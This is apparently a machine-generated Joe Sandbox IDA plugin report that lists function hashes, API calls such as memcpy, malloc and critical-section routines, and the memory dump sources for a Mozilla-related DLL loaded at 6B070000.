                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseEnvironmentHandleVariable
                                                                                                                                                        • String ID: MOZ_SKELETON_UI_RESTARTING
                                                                                                                                                        • API String ID: 297244470-335682676
                                                                                                                                                        • Opcode ID: fc22615bdc9e0c957def7d5cf7325328dcf2bc7f122262347dfc936c35fcb9bf
                                                                                                                                                        • Instruction ID: d4fe309f9e1542a3c3dc065c8c5fbb818277fb392c02576a148fec9cbb6da567
                                                                                                                                                        • Opcode Fuzzy Hash: fc22615bdc9e0c957def7d5cf7325328dcf2bc7f122262347dfc936c35fcb9bf
                                                                                                                                                        • Instruction Fuzzy Hash: 4DE04F34204340BBEB049B68D908746BFEDEB17775F048544EE69936D1CBB9E844C7A1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6B074E9C,?,?,?,?,?), ref: 6B07510A
                                                                                                                                                        • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6B074E9C,?,?,?,?,?), ref: 6B075167
                                                                                                                                                        • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6B075196
                                                                                                                                                        • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6B074E9C), ref: 6B075234
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3510742995-0
                                                                                                                                                        • Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                                                                                                                        • Instruction ID: 44f82e48e1e7e52ab1e112a3c9a7d973411b34f0ea33987f425c0aff569a4c49
                                                                                                                                                        • Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                                                                                                                        • Instruction Fuzzy Hash: 28919039604616CFCB28DF18C490A9AFBA2FF89314B198598DD585B325D336FC42CBE0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6B0FE7DC), ref: 6B0B0918
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6B0FE7DC), ref: 6B0B09A6
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6B0FE7DC,?,00000000), ref: 6B0B09F3
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6B0FE7DC), ref: 6B0B0ACB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                        • Opcode ID: 3a029d01361551b3aaa2a119728855a035e14dcf896946b07a654efbc86eba40
                                                                                                                                                        • Instruction ID: f4e7fb120eedf4a02d0dff414dfd1eb7b78ec3fce92ac69cfbcc402e1b8d3936
                                                                                                                                                        • Opcode Fuzzy Hash: 3a029d01361551b3aaa2a119728855a035e14dcf896946b07a654efbc86eba40
                                                                                                                                                        • Instruction Fuzzy Hash: 01514C32715610CFEF1C9B64D9407297FEAEB82F6071585B9DD6597780EB3AEC028780
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • malloc.MOZGLUE(?,?,?,?,?,?,?,?,00000008,?,6B0AE56A,?,|UrlbarCSSSpan,0000000E,?), ref: 6B0D5A47
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,00000008,?,6B0AE56A,?,|UrlbarCSSSpan), ref: 6B0D5A5C
                                                                                                                                                        • free.MOZGLUE(?), ref: 6B0D5A97
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000010), ref: 6B0D5B9D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$mallocmemset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2682772760-0
                                                                                                                                                        • Opcode ID: d3d88c943795f5eca21937a78b887d9cc1c96528bde1efa50e3d4ef7fa85f90c
                                                                                                                                                        • Instruction ID: c7f38dff053a5fe441dbda370f2af6b8ec391fde7259146b9b36ad4c0ae997a7
                                                                                                                                                        • Opcode Fuzzy Hash: d3d88c943795f5eca21937a78b887d9cc1c96528bde1efa50e3d4ef7fa85f90c
                                                                                                                                                        • Instruction Fuzzy Hash: EE517D746087509FD704CF28C8C071ABBE5FF89318F0489AEE9899B286D778D944CB62
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 363e16ee16beb0c39604ce07965c2e952edc96bb1d44849f0de8bd41444930e9
                                                                                                                                                        • Instruction ID: 611cade51114552e993ec4b24264d7c2da21941b135b9234fbb4cd8c732135e8
                                                                                                                                                        • Opcode Fuzzy Hash: 363e16ee16beb0c39604ce07965c2e952edc96bb1d44849f0de8bd41444930e9
                                                                                                                                                        • Instruction Fuzzy Hash: 6351AEB1A00206DFDB08CF18C89075ABFB1FF48314F558269D9199B381D779EA95CF90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6B0D61DD
                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6B0D622C
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6B0D6250
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6B0D6292
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: malloc$freememcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4259248891-0
                                                                                                                                                        • Opcode ID: 22a88545e6f4ff1c4562f5cb7c6034dc4d65c0eb24ce54c2f1b87aa2231c20e2
                                                                                                                                                        • Instruction ID: ba3ba6c609ee4a936d96c3b03dc89ca08f45dc14440f9beea2ca91709e67cf44
                                                                                                                                                        • Opcode Fuzzy Hash: 22a88545e6f4ff1c4562f5cb7c6034dc4d65c0eb24ce54c2f1b87aa2231c20e2
                                                                                                                                                        • Instruction Fuzzy Hash: 18310871A0070A8FDB18CF28D881B7A7BE9FB55304F104579C95AD72A1EB35E558CB50
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000010,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 6B08BBF4
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 6B08BC66
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 6B08BC96
                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,00000010,0000001F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B08BCCE
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: malloc$freememcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4259248891-0
                                                                                                                                                        • Opcode ID: 386c90c7ac5c70553b0429d9a14f846b24ccaa4571c1d74b898fd52df38d00f0
                                                                                                                                                        • Instruction ID: 49fdf4c9d028a83d41554ba905ea55eb28a33af55c0af06e8e8a418ed472ce21
                                                                                                                                                        • Opcode Fuzzy Hash: 386c90c7ac5c70553b0429d9a14f846b24ccaa4571c1d74b898fd52df38d00f0
                                                                                                                                                        • Instruction Fuzzy Hash: F1215771F002044BFB188F3DDC8272E7EEAEB85394F544938D856D6351EE76E6448361
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6B08B96F
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020), ref: 6B08B99A
                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6B08B9B0
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6B08B9B9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy$freemalloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3313557100-0
                                                                                                                                                        • Opcode ID: 53d6b958a3dde18d2e4ddbbdb5a23f234a3944a42ce44e5d1bd51112426c63b3
                                                                                                                                                        • Instruction ID: e677dd9711be0100c3c7c43a31edb586dec8b428667146be01fb4393a68d2940
                                                                                                                                                        • Opcode Fuzzy Hash: 53d6b958a3dde18d2e4ddbbdb5a23f234a3944a42ce44e5d1bd51112426c63b3
                                                                                                                                                        • Instruction Fuzzy Hash: D31142B1A002059FCB18CF69D88199BBBF9BF98214B14453AE959D3301E735EA158AA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%